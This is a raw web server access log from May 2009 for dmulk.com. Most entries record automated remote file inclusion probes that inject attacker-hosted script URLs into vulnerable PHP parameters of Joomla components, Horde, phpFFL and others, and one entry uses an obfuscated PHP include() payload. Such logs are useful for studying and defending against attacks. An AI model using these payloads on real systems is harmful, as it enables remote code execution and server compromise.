77.221.130.10 - - [19/May/2009:10:31:23 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 200 42073 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.10 - - [19/May/2009:10:31:26 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 200 100197 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.10 - - [19/May/2009:10:31:27 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 200 42073 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:10:31:30 -0700] "GET /errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:10:31:30 -0700] "GET /logs/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:10:31:30 -0700] "GET /logs/access_081116.log/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:10:31:30 -0700] "GET /logs/access_090112.log/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:10:31:51 -0700] "GET /logs/access_090112.log/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.73.8.201 - - [19/May/2009:10:31:51 -0700] "GET /logs/access_081018.log//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.73.8.201 - - [19/May/2009:10:31:52 -0700] "GET /horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.73.8.201 - - [19/May/2009:10:31:52 -0700] "GET /logs//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:10:31:53 -0700] "GET /errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:10:31:53 -0700] "GET /logs/access_081116.log/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:10:31:53 -0700] "GET /logs/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:10:31:54 -0700] "GET /playing.php/common/db.php?commonpath=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:10:31:54 -0700] "GET /logs/access_080909.log%20%20/playing.php/common/db.php?commonpath=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:10:31:54 -0700] "GET /logs/playing.php/common/db.php?commonpath=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:10:31:54 -0700] "GET /logs/access_081113.log%20%20/playing.php/common/db.php?commonpath=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.145.133 - - [19/May/2009:10:32:03 -0700] "GET /editsite.php?returnpath=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.145.133 - - [19/May/2009:10:32:03 -0700] "GET /logs/editsite.php?returnpath=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.145.133 - - [19/May/2009:10:32:03 -0700] "GET /logs/access_090302.log%20%20/editsite.php?returnpath=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.145.133 - - [19/May/2009:10:32:08 -0700] "GET /logs/access_090221.log%20%20/editsite.php?returnpath=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:10:32:14 -0700] "GET /logs/playing.php/common/db.php?commonpath=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:10:32:14 -0700] "GET /playing.php/common/db.php?commonpath=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:10:32:14 -0700] "GET /logs/access_080909.log%20%20/playing.php/common/db.php?commonpath=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:10:32:14 -0700] "GET /logs/access_081113.log%20%20/playing.php/common/db.php?commonpath=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.186.1.54 - - [19/May/2009:10:32:16 -0700] "GET /logs/access_080919.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://largeface.com/gnuboard4/gnus/id4.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
89.186.1.54 - - [19/May/2009:10:32:16 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://largeface.com/gnuboard4/gnus/id4.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
89.186.1.54 - - [19/May/2009:10:32:17 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://largeface.com/gnuboard4/gnus/id4.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
212.227.96.166 - - [19/May/2009:10:32:28 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.atidgourmet.cl/greybox/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.227.96.166 - - [19/May/2009:10:32:28 -0700] "GET /logs/Neos_Chronos/header.php?base_folder=http://www.atidgourmet.cl/greybox/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.227.96.166 - - [19/May/2009:10:32:28 -0700] "GET /logs/access_080313.log/Neos_Chronos/header.php?base_folder=http://www.atidgourmet.cl/greybox/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
110.45.145.50 - - [19/May/2009:10:33:17 -0700] "GET /logs/access_080923.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:10:33:19 -0700] "GET /logs/access_080909.log/playing.php/common/db.php?commonpath=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:10:33:19 -0700] "GET /logs/access_081113.log/playing.php/common/db.php?commonpath=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.132.9.55 - - [19/May/2009:10:33:29 -0700] "GET /logs/include/lib.inc.php?site_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.32.100.130 - - [19/May/2009:10:33:31 -0700] "GET /logs/path%5Bdocroot%5D=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.32.100.130 - - [19/May/2009:10:33:31 -0700] "GET /logs/access_080313.log/path%5Bdocroot%5D=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.32.100.130 - - [19/May/2009:10:33:31 -0700] "GET /path%5Bdocroot%5D=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.246.20.221 - - [19/May/2009:10:33:41 -0700] "GET /logs/access_090221.log/slice.php3?GLOBALS[AA_INC_PATH]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.246.20.221 - - [19/May/2009:10:33:41 -0700] "GET /logs/access_090308.log/slice.php3?GLOBALS[AA_INC_PATH]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.246.20.221 - - [19/May/2009:10:33:41 -0700] "GET /logs/slice.php3?GLOBALS[AA_INC_PATH]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:10:33:46 -0700] "GET /logs/access_080909.log/playing.php/common/db.php?commonpath=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:10:33:46 -0700] "GET /logs/access_081113.log/playing.php/common/db.php?commonpath=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:10:33:52 -0700] "GET /skin/zero_vote/error.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:10:33:52 -0700] "GET /logs/access_071214.log//skin/zero_vote/error.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:10:33:52 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:10:33:53 -0700] "GET /logs/access_071214.log//skin/zero_vote/error.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:10:33:53 -0700] "GET /skin/zero_vote/error.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:10:33:53 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.246.20.221 - - [19/May/2009:10:33:56 -0700] "GET /logs/access_090308.log%20%20/slice.php3?GLOBALS[AA_INC_PATH]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.246.20.221 - - [19/May/2009:10:33:56 -0700] "GET /logs/access_090221.log%20%20/slice.php3?GLOBALS[AA_INC_PATH]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:10:33:56 -0700] "GET /logs/access_081123.log//?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:10:33:57 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 200 100196 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:10:34:00 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:10:34:00 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:10:34:00 -0700] "GET /logs/access_081230.log//include/print_category.php?setup[use_category]=1&dir=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:10:34:01 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
218.246.20.221 - - [19/May/2009:10:34:05 -0700] "GET /logs/access_090306.log/slice.php3?GLOBALS[AA_INC_PATH]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:10:34:08 -0700] "GET /logs/access_080410.log//?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:10:34:15 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:10:34:17 -0700] "GET /logs/access_071215.log//skin/zero_vote/error.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:10:34:18 -0700] "GET /logs/access_071215.log//skin/zero_vote/error.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.232.81 - - [19/May/2009:10:34:32 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:10:34:32 -0700] "GET /logs/access_080929.log//include/print_category.php?setup[use_category]=1&dir=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.44.232.81 - - [19/May/2009:10:34:32 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.44.232.81 - - [19/May/2009:10:34:33 -0700] "GET /logs/access_090217.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [19/May/2009:10:34:35 -0700] "GET /logs/access_090217.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [19/May/2009:10:34:35 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [19/May/2009:10:34:35 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [19/May/2009:10:34:35 -0700] "GET /logs/access_090208.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.44.232.81 - - [19/May/2009:10:34:36 -0700] "GET /logs/access_090208.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [19/May/2009:10:34:36 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [19/May/2009:10:34:36 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [19/May/2009:10:34:36 -0700] "GET /logs/access_090217.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [19/May/2009:10:34:36 -0700] "GET /logs/access_090208.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [19/May/2009:10:34:37 -0700] "GET /logs/access_090217.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [19/May/2009:10:34:37 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [19/May/2009:10:34:37 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [19/May/2009:10:34:38 -0700] "GET /logs/access_090208.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.44.232.81 - - [19/May/2009:10:34:39 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [19/May/2009:10:34:39 -0700] "GET /logs/access_090217.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [19/May/2009:10:34:39 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [19/May/2009:10:34:39 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [19/May/2009:10:34:39 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [19/May/2009:10:34:39 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [19/May/2009:10:34:39 -0700] "GET /logs/access_090208.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.44.232.81 - - [19/May/2009:10:34:39 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [19/May/2009:10:34:40 -0700] "GET /logs/access_090217.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.44.232.81 - - [19/May/2009:10:34:40 -0700] "GET /logs/access_090217.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:10:34:40 -0700] "GET /?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 200 42065 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [19/May/2009:10:34:40 -0700] "GET /logs/access_090208.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.44.232.81 - - [19/May/2009:10:34:43 -0700] "GET /logs/access_090208.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:34:44 -0700] "GET /logs/access_081119.log%20%20/?_zb_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:34:44 -0700] "GET /logs/?_zb_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 200 100191 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [19/May/2009:10:34:44 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [19/May/2009:10:34:44 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [19/May/2009:10:34:44 -0700] "GET /logs/access_090217.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [19/May/2009:10:34:44 -0700] "GET /logs/access_090208.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [19/May/2009:10:34:46 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
64.157.4.41 - - [19/May/2009:10:34:46 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:10:34:48 -0700] "GET /logs/access_081128.log%20%20/principal.php?conteudo=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:34:54 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:34:57 -0700] "GET /logs/access_080522.log//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:34:57 -0700] "GET /components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [19/May/2009:10:35:00 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
70.132.9.55 - - [19/May/2009:10:35:10 -0700] "GET /logs/access_080619.log%20%20/include/lib.inc.php?site_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.44.232.81 - - [19/May/2009:10:35:12 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.44.232.81 - - [19/May/2009:10:35:12 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.44.232.81 - - [19/May/2009:10:35:12 -0700] "GET /logs/access_090217.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.132.9.55 - - [19/May/2009:10:35:14 -0700] "GET /logs/access_080925.log%20%20/include/lib.inc.php?site_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.44.232.81 - - [19/May/2009:10:35:16 -0700] "GET /logs/access_090208.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:35:25 -0700] "GET /?_zb_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 200 42055 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:35:31 -0700] "GET /logs/access_081119.log%20%20/?_zb_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:35:31 -0700] "GET /?_zb_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.0" 200 42038 "-" "Mozilla/5.0" "www.dmulk.com"
